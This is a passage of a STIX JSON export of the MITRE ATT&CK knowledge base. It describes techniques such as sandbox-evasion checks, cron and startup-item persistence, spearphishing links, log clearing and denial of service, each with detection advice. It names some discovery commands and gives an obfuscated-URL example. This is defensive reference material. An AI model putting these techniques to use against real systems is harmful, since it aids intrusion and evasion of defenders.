"x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", "created": "2020-03-11T14:11:16.560Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1568/001", "external_id": "T1568.001"}, {"source_name": "MehtaFastFluxPt1", "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref"}, {"source_name": "MehtaFastFluxPt2", "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref"}, {"source_name": "Fast Flux - Welivesecurity", "description": "Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.", "url": "https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T12:49:40.919Z", "name": "System Checks", "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Deloitte Threat Library Team", "Kostya Vasilkov"], "x_mitre_deprecated": false, "x_mitre_detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Static File Analysis", "Signature-based detection", "Host forensic analysis", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", "created": "2020-03-06T20:57:37.959Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1497/001", "external_id": "T1497.001"}, {"source_name": "Unit 42 OilRig Sept 2018", "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.", "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/"}, {"source_name": "McAfee Virtual Jan 2017", "description": "Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.", "url": "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/"}, {"source_name": "Deloitte Environment Awareness", "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.", "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:01.778Z", "name": "Detect Operating Mode", "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0868", "external_id": "T0868"}, {"source_name": "Machine Information Systems 2007", "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", "url": "http://www.machine-information-systems.com/How_PLCs_Work.html"}, {"source_name": "N.A. October 2017", "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489"}, {"source_name": "Omron", "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified."}, {"source_name": "PLCgurus 2021", "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", "url": "https://www.plcgurus.net/plc-basics/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Cron", "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", "created": "2019-12-03T14:25:00.538Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/003", "external_id": "T1053.003"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Domain Groups", "description": "Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n\nCommands such as net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Harshal Tupsamudre, Qualys", "Miriam Wiesner, @miriamxyra, Microsoft Security"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", "created": "2020-02-21T21:15:06.561Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1069/002", "external_id": "T1069.002"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Vulnerabilities", "description": "Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", "created": "2020-10-15T02:59:38.628Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/006", "external_id": "T1588.006"}, {"source_name": "National Vulnerability Database", "description": "National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020.", "url": "https://nvd.nist.gov/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-15T23:51:25.037Z", "name": "Spearphishing Link", "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an \u201c@\u201d symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nAdversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through \u201cconsent phishing\u201d into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)\n\nSimilarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as \u201cdevice code phishing,\u201d an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Philip Winther", "Shailesh Tiwary (Indian Army)", "Mark Wee", "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", "Kobi Haimovich, CardinalOps", "Menachem Goldstein"], "x_mitre_deprecated": false, "x_mitre_detection": "URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites as well as links redirecting to adversary infrastructure based by upon suspicious OAuth patterns with unusual TLDs.(Citation: Microsoft OAuth 2.0 Consent Phishing 2021). Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nBecause this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "2.6", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "created": "2020-03-02T19:15:44.182Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1566/002", "external_id": "T1566.002"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}, {"source_name": "CISA IDN ST05-016", "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.", "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016"}, {"source_name": "Trend Micro Pawn Storm OAuth 2017", "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks"}, {"source_name": "Netskope Device Code Phishing 2021", "description": "Jenko Hwong. (2021, August 10). New Phishing Attacks Exploiting OAuth Authorization Flows (Part 1). Retrieved March 19, 2024.", "url": "https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1"}, {"source_name": "Microsoft OAuth 2.0 Consent Phishing 2021", "description": "Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.", "url": "https://www.microsoft.com/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "Mandiant URL Obfuscation 2023", "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.", "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse"}, {"source_name": "Optiv Device Code Phishing 2021", "description": "Optiv. (2021, August 17). Microsoft 365 OAuth Device Code Flow and Phishing. Retrieved March 19, 2024.", "url": "https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing"}, {"source_name": "SecureWorks Device Code Phishing 2021", "description": "SecureWorks Counter Threat Unit Research Team. (2021, June 3). OAuth\u2019S Device Code Flow Abused in Phishing Attacks. Retrieved March 19, 2024.", "url": "https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Startup Items", "description": "Per Apple\u2019s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, /Library/StartupItems isn\u2019t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1165", "external_id": "T1165"}, {"source_name": "Startup Items", "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-10-13T17:57:01.994Z", "name": "Loss of Protection", "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", "created": "2021-04-12T07:57:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0837", "external_id": "T0837"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Clear Linux or Mac System Logs", "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* /var/log/messages:: General and system-related messages\n* /var/log/secure or /var/log/auth.log: Authentication logs\n* /var/log/utmp or /var/log/wtmp: Login records\n* /var/log/kern.log: Kernel logs\n* /var/log/cron.log: Crond logs\n* /var/log/maillog: Mail server logs\n* /var/log/httpd/: Web server access and error logs\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", "created": "2020-01-28T17:11:54.034Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/002", "external_id": "T1070.002"}, {"source_name": "Linux Logs", "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.", "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Application or System Exploitation", "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.\n\nAdversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "created": "2020-02-20T15:37:27.052Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499/004", "external_id": "T1499.004"}, {"source_name": "Sucuri BIND9 August 2015", "description": "Cid, D.. (2015, August 2). BIND9 \u2013 Denial of Service Exploit in the Wild. Retrieved April 26, 2019.", "url": "https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Office Application 